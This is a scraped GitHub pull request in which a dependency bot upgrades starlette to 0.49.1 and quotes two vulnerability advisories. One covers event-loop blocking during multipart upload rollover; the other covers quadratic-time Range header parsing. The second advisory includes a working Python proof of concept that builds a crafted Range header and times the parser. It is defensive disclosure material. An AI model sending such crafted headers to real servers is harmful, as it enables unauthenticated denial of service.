chore(deps): update dependency starlette to v0.49.1 [security] #185

renovate · 2025-07-22T00:05:31Z

This PR contains the following updates:

Package	Change	Age	Confidence
starlette (changelog)	`==0.41.3` -> `==0.49.1`

GitHub Vulnerability Alerts

CVE-2025-54121

Summary

When parsing a multi-part form with large files (greater than the default max spool size) starlette will block the main thread to roll the file over to disk. This blocks the event thread which means we can't accept new connections.

Details

Please see this discussion for details: https://github.com/encode/starlette/discussions/2927#discussioncomment-13721403. In summary the following UploadFile code (copied from here) has a minor bug. Instead of just checking for self._in_memory we should also check if the additional bytes will cause a rollover.

    @&#8203;property
    def _in_memory(self) -> bool:
        # check for SpooledTemporaryFile._rolled
        rolled_to_disk = getattr(self.file, "_rolled", True)
        return not rolled_to_disk

    async def write(self, data: bytes) -> None:
        if self.size is not None:
            self.size += len(data)

        if self._in_memory:
            self.file.write(data)
        else:
            await run_in_threadpool(self.file.write, data)

I have already created a PR which fixes the problem: https://github.com/encode/starlette/pull/2962

PoC

See the discussion here for steps on how to reproduce.

Impact

To be honest, very low and not many users will be impacted. Parsing large forms is already CPU intensive so the additional IO block doesn't slow down starlette that much on systems with modern HDDs/SSDs. If someone is running on tape they might see a greater impact.

CVE-2025-62727

Summary

An unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse).

Details

Starlette parses multi-range requests in FileResponse._parse_range_header(), then merges ranges using an O(n^2) algorithm.

# starlette/responses.py
_RANGE_PATTERN = re.compile(r"(\d*)-(\d*)") # vulnerable to O(n^2) complexity ReDoS

class FileResponse(Response):
    @&#8203;staticmethod
    def _parse_range_header(http_range: str, file_size: int) -> list[tuple[int, int]]:
        ranges: list[tuple[int, int]] = []
        try:
            units, range_ = http_range.split("=", 1)
        except ValueError:
            raise MalformedRangeHeader()

        # [...]

        ranges = [
            (
                int(_[0]) if _[0] else file_size - int(_[1]),
                int(_[1]) + 1 if _[0] and _[1] and int(_[1]) < file_size else file_size,
            )
            for _ in _RANGE_PATTERN.findall(range_) # vulnerable
            if _ != ("", "")
        ]

The parsing loop of FileResponse._parse_range_header() uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted Range header can maximize its complexity.

The merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.

This affects any Starlette application that uses:

starlette.staticfiles.StaticFiles (internally returns FileResponse) — starlette/staticfiles.py:178
Direct starlette.responses.FileResponse responses

PoC

#!/usr/bin/env python3

import sys
import time

try:
    import starlette
    from starlette.responses import FileResponse
except Exception as e:
    print(f"[ERROR] Failed to import starlette: {e}")
    sys.exit(1)

def build_payload(length: int) -> str:
    """Build the Range header value body: '0' * num_zeros + '0-'"""
    return ("0" * length) + "a-"

def test(header: str, file_size: int) -> float:
    start = time.perf_counter()
    try:
        FileResponse._parse_range_header(header, file_size)
    except Exception:
        pass
    end = time.perf_counter()
    elapsed = end - start
    return elapsed

def run_once(num_zeros: int) -> None:
    range_body = build_payload(num_zeros)
    header = "bytes=" + range_body
    # Use a sufficiently large file_size so upper bounds default to file size
    file_size = max(len(range_body) + 10, 1_000_000)
    
    print(f"[DEBUG] range_body length: {len(range_body)} bytes")
    elapsed_time = test(header, file_size)
    print(f"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\n")

if __name__ == "__main__":
    print(f"[INFO] Starlette Version: {starlette.__version__}")
    for n in [5000, 10000, 20000, 40000]:
        run_once(n)

"""
$ python3 poc_dos_range.py
[INFO] Starlette Version: 0.48.0
[DEBUG] range_body length: 5002 bytes
[DEBUG] elapsed time: 0.053932 seconds

[DEBUG] range_body length: 10002 bytes
[DEBUG] elapsed time: 0.209770 seconds

[DEBUG] range_body length: 20002 bytes
[DEBUG] elapsed time: 0.885296 seconds

[DEBUG] range_body length: 40002 bytes
[DEBUG] elapsed time: 3.238832 seconds
"""

Impact

Any Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.

Release Notes

Kludex/starlette (starlette)

chore(deps): update dependency starlette to v0.49.1 [security] #185

Are you sure you want to change the base?

chore(deps): update dependency starlette to v0.49.1 [security] #185

Uh oh!

Conversation

renovate bot commented Jul 22, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

CVE-2025-54121

Summary

Details

PoC

Impact

CVE-2025-62727

Summary

Details

PoC

Impact

Release Notes

v0.49.1: Version 0.49.1

Fixed

v0.49.0: Version 0.49.0

Added

Changed

New Contributors

v0.48.0: Version 0.48.0

Added

Changed

New Contributors

v0.47.3: Version 0.47.3

Fixed

New Contributors

v0.47.2

Fixed

New Contributors

v0.47.1: Version 0.47.1

Fixed

v0.47.0: Version 0.47.0

Added

Changed

Fixed

New Contributors

v0.46.2: Version 0.46.2

What's Changed

New Contributors

v0.46.1: Version 0.46.1

Fixed

v0.46.0: Version 0.46.0

Added

Fixed

Changed

Deprecated

New Contributors

v0.45.3: Version 0.45.3

Fixed

v0.45.2: Version 0.45.2

Fixed

v0.45.1: Version 0.45.1

Fixed

Refactor

v0.45.0: Version 0.45.0

Removed

v0.44.0: Version 0.44.0

Added

New Contributors

v0.43.0: Version 0.43.0

Removed

Added

New Contributors

v0.42.0: Version 0.42.0

Added

Fixed

New Contributors

Configuration

Uh oh!

bolt-new-by-stackblitz bot commented Jul 22, 2025

Uh oh!

Reviewers

Assignees

Labels

renovate bot commented Jul 22, 2025 •

edited

Loading

`v0.49.1`: Version 0.49.1

`v0.49.0`: Version 0.49.0

`v0.48.0`: Version 0.48.0

`v0.47.3`: Version 0.47.3

`v0.47.2`

`v0.47.1`: Version 0.47.1

`v0.47.0`: Version 0.47.0

`v0.46.2`: Version 0.46.2

`v0.46.1`: Version 0.46.1

`v0.46.0`: Version 0.46.0

`v0.45.3`: Version 0.45.3

`v0.45.2`: Version 0.45.2

`v0.45.1`: Version 0.45.1

`v0.45.0`: Version 0.45.0

`v0.44.0`: Version 0.44.0

`v0.43.0`: Version 0.43.0

`v0.42.0`: Version 0.42.0